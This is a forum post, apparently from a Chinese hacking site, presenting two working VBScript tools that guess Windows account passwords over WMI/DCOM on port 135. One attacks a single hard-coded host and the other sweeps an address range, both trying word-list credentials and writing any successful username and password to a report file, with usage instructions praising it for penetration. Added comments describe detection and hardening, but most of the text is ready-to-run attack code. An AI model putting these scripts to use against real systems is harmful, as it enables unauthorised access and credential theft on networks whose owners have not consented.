135端口扫弱口令的vbs(效率低下)
作者:lcx
来源:vbs小铺
' Script 1: tries every user/password pair from two word lists against one
' hard-coded host by authenticating to its WMI service (DCOM, reached via
' the RPC endpoint mapper on TCP 135).
'
' Defender notes:
'  - Each ConnectServer call with explicit credentials is a remote
'    authentication attempt. Failures are typically recorded on the target
'    as failed network logons (Security event 4625, logon type 3) when
'    logon auditing is enabled; a burst of them from one source across
'    many account names is the pattern to alert on.
'  - Account lockout policy, firewalling TCP 135/DCOM from untrusted
'    segments, and limiting remote WMI rights reduce exposure.
'  - The report file stores the working username and password in clear
'    text and must be treated as sensitive.
'
' Errors are suppressed globally; the main loop inspects Err after each
' attempt, so statement order here matters.
On Error Resume Next
set fso=CreateObject("Scripting.FileSystemObject")

' Returns element i (zero-based) of the file's contents split on CRLF.
' Returns nothing if the file is missing or empty. The whole file is
' re-read on every call.
Function filenumshow(filename,i)
    Dim temparray
    if not fso.fileExists(filename) then exit Function
    set f = fso.opentextfile(filename,1)
    if not f.AtEndofStream then
        tempcnt = f.readall
        temparray = split(tempcnt,chr(13)&chr(10))
        filenumshow=temparray(i)
        f.close
    End if
End Function

' Returns the upper bound (last zero-based index) of the file's contents
' split on CRLF, not the number of lines. Returns nothing if the file is
' missing or empty.
Function filenum(filename)
    Dim temparray
    if not fso.fileExists(filename) then exit Function
    set f = fso.opentextfile(filename,1)
    if not f.AtEndofStream then
        tempcnt = f.readall
        temparray = split(tempcnt,chr(13)&chr(10))
        lineNum=ubound(temparray)
        filenum=lineNum
        f.close
    End if
End Function

' Outer loop: user names; inner loop: passwords. An empty user entry ends
' the run.
For i=0 To filenum("c:\user.txt")
    user=filenumshow("c:\user.txt",i)
    If user="" Then Exit for
    For l=0 To filenum("c:\pass.txt")
        pass=filenumshow("c:\pass.txt",l)
        ' Every candidate pair is echoed to the console in clear text.
        wscript.echo user&Space(5)&pass
        Call Scan("192.168.8.10",user,pass,"c:\log.txt")
        ' Err.number = 0 after Scan is the only success signal used; it
        ' ends the password loop for the current user only.
        If Err.number=0 Then
            wscript.echo "find!!!"
            Exit For
        End if
        wscript.echo Err.number&Space(10)&Err.source&Space(10)&Err.Description
        Err.clear
    next
Next

' Connects to root/cimv2 on ipaddress with the given credentials, queries
' Win32_OperatingSystem, and appends the OS caption together with the
' username and password (clear text) to the report file, which is opened
' in append mode (8) and created if absent.
Sub Scan(ipaddress,username,password,report)
    set objlocator=createobject("wbemscripting.swbemlocator")
    set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
    Set colItems = objswbemservices.ExecQuery("Select * From Win32_OperatingSystem")
    with fso.opentextfile(report,8,true)
        .writeline "==================================================="
        For Each objItem in ColItems
            .writeline ipaddress & ": " & objItem.Caption
        Next
        .writeline "username:"&username
        .writeline "password:"&password
        .writeline "==================================================="
        .close
    end with
end Sub
set fso=nothing
++++++++++++++++++++++++++++++++++++++++++++++++++++++ Enjoy Penetration Testing
' Script 2 (RPC_Scan.vbs): walks a range of addresses that differ only in
' the last octet, pings each one through WMI, and for hosts that pass the
' ping check tries user/password pairs from two word-list files against
' the host's WMI service.
'
' Defender notes:
'  - Visible traffic from one source: ICMP echo to consecutive addresses,
'    followed by DCOM/WMI connections (RPC endpoint mapper, TCP 135) to
'    the hosts that passed the check.
'  - Failed attempts are typically recorded on each target as failed
'    network logons (Security event 4625, logon type 3) when logon
'    auditing is enabled; many failures for different accounts from one
'    source is the detection signal.
'  - Account lockout, blocking TCP 135/DCOM between workstation segments,
'    and restricting remote WMI access limit what this kind of tool can
'    reach.
'  - The report file holds working credentials in clear text.
'
' Errors are suppressed globally and Err is inspected after each attempt,
' so statement order here matters.
on error resume next
' Exits when hosted by wscript.exe and asks for a console run instead.
if (lcase(right(wscript.fullname,11))="wscript.exe") then
    wscript.echo "Execute it under the cmd.exe Plz! Thx."
    wscript.quit
end if
' Five arguments are required; otherwise print the banner and usage.
if wscript.arguments.count<5 Then
    wscript.echo "RPC_Scan.vbs"
    wscript.echo "Code by NetPatch(www.icehack.com) 07.7.5"
    wscript.echo "Thx KVO,Lcx"
    wscript.echo "use: cscript "&wscript.scriptfullname&" Begin_Ip End_Ip User_dic Pass_dic Report_Path"
    wscript.quit
end if
Begin_IP=wscript.arguments(0)
End_IP=wscript.arguments(1)
User_Dic=wscript.arguments(2)
Pass_Dic=wscript.arguments(3)
Report_Path=wscript.arguments(4)
S_Ip = Split(Begin_Ip, ".", -1, 1)
E_Ip =Split(End_Ip, ".", -1, 1)
' Runs only when both addresses share the first three octets, the start
' octet is not above the end octet, and the end octet is below 255.
' Nothing is printed when this check fails.
If S_Ip(0) = E_Ip(0) And S_Ip(1) = E_Ip(1) And S_Ip(2) = E_Ip(2) And CInt(S_Ip(3)) <= CInt(E_Ip(3)) And CInt(E_Ip(3)) < 255 Then
    SE_Ip=S_Ip(0)&"."&S_Ip(1)&"."&S_Ip(2)
    Set objPings = GetObject("winmgmts:{impersonationLevel=impersonate}")
    set objlocator=createobject("wbemscripting.swbemlocator")
    For num=CInt(S_Ip(3)) To CInt(E_Ip(3))
        aMachines = SE_Ip&"."&num
        ' Local WMI ping of the candidate address.
        Set objPing=objPings._
            ExecQuery("select * from Win32_PingStatus where address = '"_
            & aMachines & "'")
        For Each objStatus in objPing
            ' A Null or zero StatusCode is what lets a host through to the
            ' credential loop.
            If IsNull(objStatus.StatusCode) or objStatus.StatusCode = 0 Then
                If user_dic <> "" Or pass_dic <> "" Then
                    set fso=CreateObject("Scripting.FileSystemObject")
                    Set file=fso.opentextfile(User_Dic,1,false)
                    ok=false
                    do while file.atendofline <> True
                        user_dic=file.readline
                        Set files=fso.opentextfile(Pass_Dic,1,false)
                        do while files.atendofline <> True
                            pass_dic=files.readline
                            ' Each candidate pair is echoed to the console in clear text.
                            wscript.echo "Conneting "&aMachines&"...." 
                            wscript.echo "user:"&user_dic
                            wscript.echo "pass:"&pass_dic
                            call Scan(aMachines,User_Dic,Pass_Dic,Report_Path)
                            ' Err.Number = 0 after Scan is the only success
                            ' signal; it leaves the password loop only.
                            If Err.Number = 0 Then Exit Do
                            Err.clear
                        Loop
                        files.close
                    Loop
                    file.close
                    set fso=nothing
                End If
            Else
                WScript.Echo(aMachines & " is not reachable")
            End If
        Next
    Next
End if

' Connects to root/cimv2 on ipaddress with the given credentials through
' the script-level objlocator, queries Win32_OperatingSystem, and appends
' the OS caption plus the username and password (clear text) to the
' report file, opened in append mode (8) and created if absent. Uses the
' script-level fso object created in the main loop.
Sub Scan(ipaddress,username,password,report)
    set objWservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
    Set colItems = objWservices.ExecQuery _
        ("Select * From Win32_OperatingSystem")
    with fso.opentextfile(report,8,true)
        .writeline "==================================================="
        For Each objItem in ColItems
            .writeline ipaddress & ": " & objItem.Caption
        Next
        .writeline "username:"&username
        .writeline "password:"&password
        .writeline "==================================================="
        .close
    end with
end sub
用法:
cscript RPC_Scan.vbs Begin_Ip End_Ip User_dic Pass_dic Report_Path
Begin_Ip //开始IP
End_Ip //结束IP
User_dic//用户列表
Pass_dic//密码档
Report_Path//输出报告路径
利用RPC(135端口)进行密码猜解
//渗透时比较好使.